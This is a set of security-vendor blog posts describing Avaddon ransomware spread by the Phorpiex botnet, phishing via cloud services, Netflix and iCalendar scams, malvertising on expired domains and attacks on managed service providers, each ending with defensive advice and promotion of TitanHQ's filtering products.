Phorpiex Botnet Activity Surges with Large-Scale Avaddon Ransomware Campaign

Recently there has been a rise in Phorpiex botnet activity. A botnet is a group of computers that have been infected with malware, placing them under the management f the botnet operator. Those computers are then used to share spam and phishing emails, often in the hope of distributing malware and ransomware. There are known to be approximately 500,000 devices in the Phorpiex botnet globally and the botnet has been in operation for around 10 years.

The Phorpiex botnet has previously been used for sharing sextortion emails, sharing cryptocurrency miners, and malware such as the Pony information stealer, GandCrab ransomware, and the XMRig cryptocurrency miner. In June, the Phorpiex botnet was deployed to conduct a huge Avaddon ransomware campaign that resulted in around 2% of companies being targeted globally.

Ransomware attacks have grown in recent times, with many ransomware gangs sharing ransomware manually after obtaining access to corporate networks by exploiting flaws in VPNs and other software or taking advantage of insecure default software configurations. There has also been a rise in ransomware attacks using email as the attack vector. Many ransomware variants are now being primarily shared by email, and Avaddon ransomware was one of the most serious email threats in June. One week in June resulted in over 1 million spam emails sent via the Phorpiex botnet, with most of those emails targeting U.S. firms.

Avaddon ransomware is a new ransomware variant that was first discovered in June. The operators of Avaddon ransomware are selling their malware as ransomware-as-a-service (RaaS) and have been identifying affiliates to distribute the ransomware for a cut of the profits.

In early June, an Avaddon ransomware campaign was detected that used JavaScript attachments in spam emails. The files had a double extension which made them look like JPG files on Windows computers. Windows computers hide file extensions by default, so the file attachment would appear to be labelled IMG123101.jpg on a Windows computer in the default configuration. If Windows had been changed to display known file extensions, the user would see the file was actually IMG123101.jpg.js. Clicking on the file would launch a PowerShell and Bitsadmin command that would trigger the install and execution of Avaddon ransomware.

More recently, a campaign was spotted that shared Avaddon ransomware using spam emails with Excel spreadsheet attachments with malicious Excel 4.0 macros. As opposed to JavaScript files, which will run when opened by users, Excel macros need user action to run, so they are less effective. Even so, users are instructed to enable the macros using a variety of social engineering techniques and they are still effective.

Avaddon ransomware searches for a variety of file types, encrypts those files and adds the .avdn extension. A ransom note is dropped, and a link is given for a Tor site along with a unique user ID to allow the victim to login to pay the ransom for the keys to unlock encrypted files. There is no free decryptor on the market for Avaddon ransomware. File recovery can on only be completed if the ransom is paid or if viable backups exist that have not also been encrypted by the ransomware.

Many subject lines have been inlcuded in the emails, such as “Your new photo?” and “Do you like my photo?”, with only a 😉 emoji in the body of the email. This tactic is simple, yet effective.

There are many steps that can be taken by companies to stop Avaddon and other email-based ransomware attacks. End user security awareness training should increase awareness of the threat and teach staff how to recognize phishing and malspam threats and condition them to report emails to their security department. If possible, macros should be disabled on all end user devices, although the email attachments used often change and disabling macros will not therefore always stop infection.

One of the strongest defenses against email threats such as phishing, malware and ransomware is to download a powerful anti-spam solution like SpamTitan. SpamTitan can work as a standalone anti-spam solution, but also as an extra tier of protection for Office 365 email, complementing Microsoft Exchange Online Protection (EOP) and providing an additional layer of security to prevent zero-day phishing and malware threats.

For more details on securing your group from ransomware and other email threats, give the TitanHQ team a call now.

Phishers Leverage Google Cloud Services to Capture Steal Office 365 Credentials

A new phishing campaign has been discovered that leverages Google Cloud Services to trick victims into handing over their Office 365 log in details. This new hacking campaign is part of an increasing trend of disguising phishing attacks using authentic cloud services.

The phishing attack begins like the majority of attacks in that an email containing a hyperlink is sent to the recipient who is then requested to click on it. If the user clicks the link in the email, they are taken to Google Drive where a PDF file has been placed. When the file is clicked on, users are asked to click a hyperlink in the document, which appears to be an invitation to open  a file hosted on SharePoint Online.

The PDF file asks the victim to visit  the link to sign in with their Office 365 ID. Clicking the link will bring the user to a landing page hosted using Google’s storage.googleapis.com. When the user vosots on the landing page, they are shown with an Office 365 login prompt that looks exactly like the real thing. After entering their details, they will be directed to a legitimate PDF whitepaper that has been obtained from a well-respected global consulting company.

The campaign has been created to make it look like the victim is simply being taken to a PDF file that has been shared via Sharepoint, and the actual PDF file is displayed after the victim has divulged their details. It is therefore possible that the victim will not realize that their Office 365 credentials have been phished. The only sign that this is a scam is the source code on the phishing page, which even tech-savvy people would be unlikely to check.

This campaign was discovered by experts at Check Point, but it is just one of many similar campaigns to have been identified over the past few months. Since these domains are authentic and have valid SSL certificates, they are difficult to detect as malicious. This campaign targeted Google Cloud Services, but several other campaigns have been detected using the likes of IBM Cloud, Microsoft Azure and others to add authenticity to the campaigns.

This campaign emphasises the importance of providing security awareness training to the workforce and warning employees about the risks of visiting links in unsolicited emails, even those that link to real domains. An advanced email security solution should also be put in place to prevent malicious emails and ensure the majority of malicious messages are not sent to inboxes. That is an area where TitanHQ can be of assistance.

Hackers Leveraging Inactive Domains to Attack Web Users

Hackers have begun using a new tactic to spread malware and conduct phishing attacks on unsuspecting internet users. They are hijacking inactive domains and using them to bring visitors to malicious websites in a form of malvertising attacks.

Malvertising classified as the use of malicious code in seemingly legitimate adverts, which are often displayed on high-traffic websites.  Website owners use third-party ad networks as a way to increase revenue from their websites. Most of these adverts are genuine and will bring users to a legitimate website, but hackers often sneak malicious code into these adverts. Visiting the link will result in the user being sent to a website hosting an exploit kit or phishing form. In some instances, ‘drive-by’ malware downloads take place without any user interaction, simply if the web content loads and the user has a susceptible device.

The new tactic leverages domains that have expired and are no longer active. These websites may still be listed in the search engine browser result pages for key search terms. When user enters a search and clicks the link or uses a link in their bookmarks to an earlier visited website, they will arrive at a landing page that explains that the website is no longer active. A lot of the time that page will include a series of links that will direct the visitor to related websites.

What often happens is these expired domains are put up for sale. They can be attractive for purchasers as there may already be many existing links to the website, which is better than starting a brand-new website from scratch. These expired domains are then sold to the highest bidder. Experts at Kaspersky found that cybercriminals have taken advantage of these auction-listed websites and have added links that bring visitors to malicious websites.

When a visitor lands on the site, instead of being directed to the auction stub, the stub is replaced with a link to a malicious website. The study showed that almost 1,000 domains that had been listed for sale on a popular auction site, which brought visitors to more than 2,500 unwanted URLs. In the majority of those cases, the URLs were ad-related pages, but 11% of the URLs were malicious and were mostly being used to spread the Shlayer Trojan via infected documents that the user is prompted to download. The Shlayer Trojan places adware on the user’s device. Several of the sites hosted malicious code on the site rather than redirecting the visitor to a different website.

These domains were once genuine websites, but are now being used for malicious purposes, which makes the threat hard to prevent. In some instances, the sites will display different content based on where the user is located and if they are using a VPN to log on the internet. These websites change content frequently, but they are indexed and categorized and if ruled to be malicious they are added to real time block lists (RBLs).

A web filtering solution like WebTitan can add protection from malvertising and redirects to malicious sites. If an attempt is made to send a user to a known malicious website, rather than being linked the user will be directed to a local block page, addressing the threat. WebTitan can also be configured to block downloads of risky file types from these web pages.

Many groups have put in place firewalls to prevent direct attacks by hackers, use antivirus software to block malware, and use an anti-spam solution to block attacks via email, but there is a vulnerability in their security protections and web-based threats are not effectively tackled. WebTitan allows groups to plug that gap and control the websites that can be accessed by staff.

For more information on WebTitan and filtering the internet, contact the TitanHQ.

Beware of new New Netflix Phishing Scam

Any widely-used platform is an lucrative target for cyber criminals, and with more than 167 million subscribers worldwide, the Netflix streaming service certainly falls into that area. While Netflix may not appear a main attraction for phishers, a successful attack could give scammers access to credit card and banking details.

Netflix phishing scams are popular, so it is not uncommon to see yet another scam kicked off, but one of the most recent uses a novel tactic to evade security solutions. By incorporating a CAPTCHA challenge, it is more difficult for security solutions to access the phishing websites and spot their malicious intent.

This Netflix phishing scam launches with an email like many other Netflix scams that came before. The emails look like they have been sent from the Netflix customer support team and advise the recipient there has been an issue with billing for the most recent monthly payment. As a result, the subscription will be suspended in the next day.

The Netflix user is given with a link to click and they are told they need to update their information on file. The emails also include a link to unsubscribe and amend communication preferences, although they are not operational.

As with the majority of phishing scams there is urgency and a threat. Update your details within 24 hours or you will lose access to the service. Clicking the link will bring the user to a fully functioning CAPTCHA page, where they are required to go through the normal CAPTCHA checks to verify they are not a bot. If the CAPTCHA challenge is passed, the user will be brought to a hijacked domain where they are presented with the standard Netflix sign-in page.

They must log-in, then they are asked to enter their billing address, along with their full name and date of birth, and then toy a second page where they are asked for their card number details, expiry date, CVV code, and optional fields for their bank sort code, account number, and bank name. If those details are provided they are told that they have correctly verified their information and they will be redirected to the real Netflix page, most likely unaware that they have given highly sensitive information to the phishers.

There have been many Netflix phishing emails captured over the past few months claiming accounts have been put on hold due to problems with payments. The emails are realistic and very closely resemble the emails sent out regularly by Netflix to service account holders. The emails include the Netflix logo, correct color schemes, and direct the recipients to authentic looking login pages.

What all of these emails have in common is they are connected to a domain other than Netflix.com. If you are sent that appears to be from Netflix, especially one that contains some sort of warning or threat, login to the site by typing the actual domain into the address bar and always make sure you are on the correct website before entering any sensitive details.

Preventing Cyberattacks for Managed Services Providers

Managed Service Providers are a lucrative victim for hackers. If a threat actor can obtain access to an MSP’s network, they can use the same remote management tools that MSPs use to carry out attacks on the MSPs clients.

Many businesses are now turning to MSPs for IT support and management services. This is typically the most cost-effective solution, especially when firms lack the in-house IT expertise to manage their networks, applications, and security. An MSP will typically supply IT management services for many different firms. A successful cyberattack on the MSP can result in a threat actor gaining access to the networks of all the MSPs clients, which makes the attack extremely worthwhile.

There was a marked rise in cyberattacks on managed service suppliers in 2019, in particular by ransomware gangs using GandCrab, Sodinokibi BitPaymer and Ryuk ransomware. The MSPs were attacked in a variety of ways, including phishing, brute force attacks on RDP, and exploitation of unpatched flaws.

Once access has been obtained to an MSP’s network, hackers search for remote management tools such as Webroot SecureAnywhere and ConnectWise which the MSP uses to access its clients’ networks to supply IT services. Several 2019 ransomware attacks on MSPs used these tools to access clients’ networks and install ransomware. MSPs such as PerCSoft, TrialWorks, BillTrust, MetroList, CloudJumper, and IT by Design were all attacked in 2019 and ransomware was deployed on their and their clients’ databases.

Kyle Hanslovan, CEO at Huntress Labs, told ZDNet in a recent telephone interview that his company had provided support to 63 MSPs that had been targeted in 2019 but believes the total number of attacks was likely to be more than 100. However, the number of MSPs that have been attacked is likely to be much higher. It is likely that many cyberattacks on MSPs are not even seen.

The attacks have shown no sign of dropping off. Recently the U.S. Secret Service issued a TLP Green alert warning MSPs of a rise in targeted cyberattacks. Compromised MSPs have been used to carry out business email compromise (BEC) attacks to get payments sent to hacker-controlled accounts. Attacks have been carried out on point-of-sale (POS) systems and malware has been deployed that intercepts and exfiltrates credit card data, and there have been several successful ransomware attacks.

Along with hackers, nation state-sponsored hacking groups have also been carrying out cyberattacks on MSPs, notably hacking groups connected with China. The National Cybersecurity and Communications Integration Center (NCCIC) issued an alert about the threat to MSPs from state-sponsored hacking groups in October 2019.

There are many best practices that can be implemented by MSPs to improve security and prevent these attacks. MSPs may currently be incredibly busy helping their clients deal with IT issues linked to the COVID-19 pandemic, but given the increase in focused cyberattacks on MSPs, time should be spent improving their own security, not just security for their clients.

The U.S Secret Service advises MSPs keep up to date on patching, especially patches for any remote administration tools they implement. ConnectWise issued a security advisory last month and patched a vulnerability in the ConnectWise Automate solution. The API vulnerability could be successfully targeted remotely by a threat actor to execute commands and/or modifications within an individual Automate instance. Vulnerabilities such as these are actively sought by hackers.

The principle of least privilege should be used for access to resources to restrict the damage inflicted in the event of a breach. It is also wise to have well-defined security controls that are fully compliant with industry standards.

Annual data audits should be completed along with regular scans to identify malware that may have been downloaded on systems. Logging should be turned on, and logs should be regularly checked to spot potentially malicious activity. MSPs should also ensure that their employees receive ongoing security awareness training to teach cybersecurity best practices and how to spot phishing and BEC scams.

Banking Credentials Targeted in iCalandar Phishing Scam

A new phishing campaign has been discovered that uses calendar invites to try and steal banking and email details. The messages in the campaign have an iCalendar email attachment which may trick employees as this is a rare file type for phishing. These attachments are therefore unlikely to have been included in security awareness training.

iCalendar files are the file types used to save scheduling and calendaring information including tasks and events. In this instance, the messages in the campaign have the subject line “Fault Detection from Message Center,” and have been issued from a legitimate email account that has been compromised by the attackers in a previous campaign.

As the email comes from a real account rather than a spoofed account, the messages will get around checks such as those conducted through DMARC, DKIM, and SPF, which identify email impersonation attacks where the true sender spoofs an account. DMARC, DKIM, and SPF check to see if the true sender of an email is authorized to send messages from a domain.

As with most phishing campaigns, the hackers use fear and urgency to get users to click without thinking about the legitimacy of the request. On this occasion, the messages include a warning from the bank’s security team that withdrawals have been made from the account that have been marked as suspicious. This campaign is aimed at mobile users, with the messages asking for the file to be opened on a mobile device.

If the email attachment is clicked on, the user will be presented with a new calendar entry titled “Stop Unauthorized Payment” which includes a Microsoft SharePoint URL. If that link is visited, the user will be directed to a Google-hosted website with a phishing kit that spoofs the login for Wells Fargo bank. Both of these websites have authentic SSL certificates, so they may not be marked as suspicious. They will also display the green padlock that shows that the connection between the browser and the website is encrypted and secure, as would be the case for the actual bank website.

The user is then asked to type their username, password, PIN, email address, email password, and account numbers. If the information is entered it is captured by the hacker and the information will be used to gain access to the accounts. To make it appear that the request is authentic, the user will then be directed to the legitimate Wells Fargo website once the information is handed over.

There are warning signs that the request is not authentic, which should be identified by security conscious people. The use of SharePoint and Google domains rather than a direct link to the Wells Fargo website are suspect, the request to only open the file on a mobile device is not explained. The phishing website also requests a lot of information, including email address and password, which are not relevant.

These flags should be enough to trick most users that the request is not real, but any phishing email that bypasses spam filtering defenses and is sent to inboxes is a danger.